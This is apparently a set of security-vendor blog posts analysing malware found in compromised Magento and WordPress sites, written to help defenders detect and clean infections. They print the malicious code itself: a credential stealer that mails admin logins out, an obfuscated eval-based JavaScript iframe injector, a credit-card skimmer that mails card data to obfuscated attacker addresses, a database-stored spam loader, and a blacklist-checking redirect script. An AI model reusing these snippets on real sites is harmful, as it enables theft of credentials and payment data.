Author: Krasimir Konov

Lately we've been dealing with an increase in attacks against ecommerce platforms. Attackers usually choose this type of solution (like Magento & others) because of the sensitive information on credit cards they can extract, as well as other potential monetary gains.

Different from other cases where they went straight to the checkout process, attackers injected a malware inside the core file "app/code/core/Mage/Admin/Model/Session.php" directly after the code used to authenticate an admin user.The malicious code is collecting the submitted information and sending it to a Gmail account via the mail function.

mail("malicious-email","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."nUsername : ".$username."nPassword : ".$password."nIP Log : ".$_SERVER['REMOTE_ADDR']);

Once login credentials are obtained, a malicious user could not only access the credit card information from the database but modify the site and add malware to infect users visiting the website. The website where this malware was found ran on Magento 1.9.0.1 which is known to have a remote code execution vulnerability. We believe this to be the attack vector used to compromise this website and inject this malware along with other malicious files.

It appears that Magento sites are being targeted heavily. In most cases we see credit cards being stolen but it looks like login credentials are also being collected. We recommend keeping your Magento installations up to date at all times. If you are unable to upgrade your Magento, we recommend placing the site behind our Website Firewall (CloudProxy ) which will virtually patch the CMS.

Last but not least, we recently published two other techniques that attackers may use to steal back-end credentials. You can check those here:

Magento Login credentials stealer

Magento CC stealer adding user's credentials to the loot

Injecting malware into core files of CMS installations is one of the techniques attackers use. From the user’s perspective, it is easier to detect and remediate such cases if they are using a File Integrity Monitoring system. On the other hand, if they are not monitoring file changes, they could be afraid of modifying such core files, therefore leaving the website infected.

During an incident response investigation, we identified the following obfuscated javascript injection in the WordPress core file “wp-includes/general-template.php”, after the _wp_render_title_tag() function:

function _wp_render_title_tag() {/*general-template.php content*/echo "<script type=\"text/javascript\">
(function(){var dazhyaft=\"\";var ybfsrany=\"77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b
66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e73657…
223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d\";for (var kytiafaz=0;kytiafaz<ybfsr
any.length;kytiafaz+=2){dazhyaft=dazhyaft+parseInt(ybfsrany.substring(kytiafaz,kytiafaz+2), 16)+\",\";}dazhyaft=dazh
yaft.substring(0,dazhyaft.length-1);eval(eval('String.fromCharCode('+dazhyaft+')'));})();
</script>";/*general-template.php content*/

After decoding the snippet, the resulting code shows that a hidden div element is being created and an iframe loads inadvertent ads from hxxp://css(dot)belayamorda(dot)info to be displayed to the user:

window.onload = function(){function x22bq(a,b,c){if(c){var d = new Date();d.setDate(d.getDate()+c);}
if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');else return false;}
function x33bq(a){var b = new RegExp(a+'=([^;]){1,}');var c = b.exec(document.cookie);if(c) c = c[0].split('=');
else return false;return c[1] ? c[1] : false;}var x33dq = x33bq("981a2d4e141fa25ceb17c79b9e0ee049");
if( x33dq != "c5ba5b8128ad05ae33785022d9e5b54c"){x22bq("981a2d4e141fa25ceb17c79b9e0ee049","c5ba5b8128ad05ae33785022d9e5b54c",1);
var x22dq = document.createElement("div");var x22qq = "hxxp://css(dot)belayamorda(dot)info/megaadvertize/?IQRnEBD&
keyword=c7d84cf6c52e44cbf494014dfc02d644&DSrLnkZjqC=BSdtLdwZ&vizGGpXMTbm=NZntgCeGxhrN&
twXzSBMLVmkBdsV=filjyodeEPIQPmysLRB&;pdWAGdxIyxfw=mALvqaAUeBl&BFELVKttdIedUh=wLQEMhvAaxckLF";
x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"
+x22qq+"'></iframe></div>";document.body.appendChild(x22dq);}}

As you can see the ads are hidden using the div element, they are pushed -1000px in order to be outside the screen but Google and other search engines can still see it and index it. This could be easily missed when reviewing the website if you are only looking at the live version of your website. Since the Search Engines are able to fetch the content, the site could get penalized and added into their Blacklist.

If you follow best security practices and have a monitoring integrity system in place as we mentioned in the beginning, you should be able to identify such issue and remediate it quickly by replacing the CMS core files. If you don’t, we highly recommend adding that piece into your website and a Website Firewall to prevent such issues from happening.

Lately, we’ve uncovered and detailed lots of techniques being used against e-commerce platforms to steal sensitive information, mostly credit card and login credentials. With the holiday season approaching, e-commerce platforms become an even higher target due to increase in sales during the season.

In this incident response case, attackers used server resources, more specifically the mail() function to send all the sensitive data after assembling it in a very interesting way.

During our analysis, we identified the following malicious code added into the file ‘./app/code/core/Mage/Checkout/Model/Type/Onepage.php’:

$a = getenv('REMOTE_ADDR');$a = json_decode(file_get_contents("hxxp://www(.)geoplugin(.)net/json(.)gp?ip={$a}"));$datasend.="Visit = ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."n";$binCC = substr($data['cc_number'], 0, 6); $subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$a->geoplugin_countryName;
                $headers = "MIME-Version: 1.0n";$ar=array("0"=>"h","1"=>"i","2"=>"a","3"=>"@","4"=>"s","5"=>"t","6"=>"p","7"=>"o","8"=>".","9"=>"m","10"=>"e","11"=>"g","12"=>"c","13"=>"r","14"=>"l","15"=>"n","16"=>"y","17"=>"b","18"=>"k","19"=>"u","20"=>"d");$recipient=$ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["11"].$ar["0"].$ar["7"].$ar["4"].$ar["5"].$ar["1"].$ar["6"].$ar["3"].$ar["11"].$ar["9"].$ar["2"].$ar["1"].$ar["14"].$ar["8"].$ar["12"].$ar["7"].$ar["9"];$sendd=$ar["6"].$ar["7"].$ar["4"].$ar["5"].$ar["3"].$ar["11"].$ar["10"].$ar["5"].$ar["2"].$ar["20"].$ar["20"].$ar["13"].$ar["8"].$ar["15"].$ar["10"].$ar["5"];mail($recipient,$subject,$datasend,$headers);mail($sendd,$subject,$datasend,$headers);

The code fetches geo location information, such as IP Address, Country, Region, City and adds into the variable $datasend, along with sensitive credit card info.

In addition to that, attackers also declared a set of characters into an array ($ar) and then, carefully crafted the content assigned to the variables $recipient and $sendd - ‘postghostip(at)gmail.com’ and ‘post(at)getaddr.net’ respectively.

Once the string is crafted and attackers have all the information they need, they send it through a mail() function to the address previously mentioned.

These type of file modifications can be easily detected if you have in place a File Integrity Monitoring System. It’s also very important to check your http / ftp logs in order to detect the entry point and vulnerability that attackers may be taking advantage of. Last but not least, we also recommend deploying a Website Firewall solution to prevent future attacks.

Attackers use different techniques to distribute SPAM in a compromised website. Most of the time they choose the file structure to inject the malicious code as it’s a more practical approach. There are exceptions to this case though, and today we are going to talk a little bit more about it.

Recently, we found a well-hidden malware in the database and the only call to it was via the theme. A single line was added to execute the code:

add_action('init', create_function('', implode("n", unserialize(get_option("themes_config")))));

If you are unfamiliar with WordPress functions and structure, the get_option() function retrieves from the database an option value based on an option name (database_prefix_options table e.g.: wp_options).

The following SPAM injection was added into the database in the option name themes_config:

The combination of the single line added to the theme file and the content in the database allows the spam links to be displayed in the post, but only for specific user agents and conditions.

The malicious domain where the SPAM content was being loaded from is unavailable at the moment (hxxp://time-to-fuck-seo(.)org/lnk/bots.dat) but attackers could simply change the domain and still use this technique.

Cleaning the core WordPress files is sometimes not enough. As you can see, one line of code in the theme could call an entire malicious script injected to the database. Because of that, it’s very important to follow best practices and implement a file integrity monitoring system and a website firewall to prevent such issues from happening, or even reaching your website in the first place.

An infected site can be efficient for cyber-criminals unless it gets blacklisted. Traffic significantly drops when a URL is on the Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign directly correlates to absence of the server in anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.

if ($_GET['mod']){
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
      $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
      if($g_out){
        header('HTTP/1.1 202');
        exit;
      }
  }

  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  header('HTTP/1.1 201');
  exit;
}

header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it’s just a web spam malware that redirects visitors to a site that sells counterfeit drugs. But if you pass certain parameters to this script it will check whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned via an HTTP code:

• 201 - not blacklisted
• 202 - blacklisted by Google
• 203 - blacklisted by Spamhaus.org

The use of HTTP codes instead of human readable results makes us think that this functionality is used by a C&C server that regularly polls blacklisting information from all compromised sites.

While this sort monitoring may be useful to hackers, it’s even more useful to normal site owners who risk their business and reputation if their sites get blacklisted. For them, it is important to be able investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If websites get blacklisted for any reason, not only do we inform the site owners about it, but also help clean and remove their sites from the blacklists.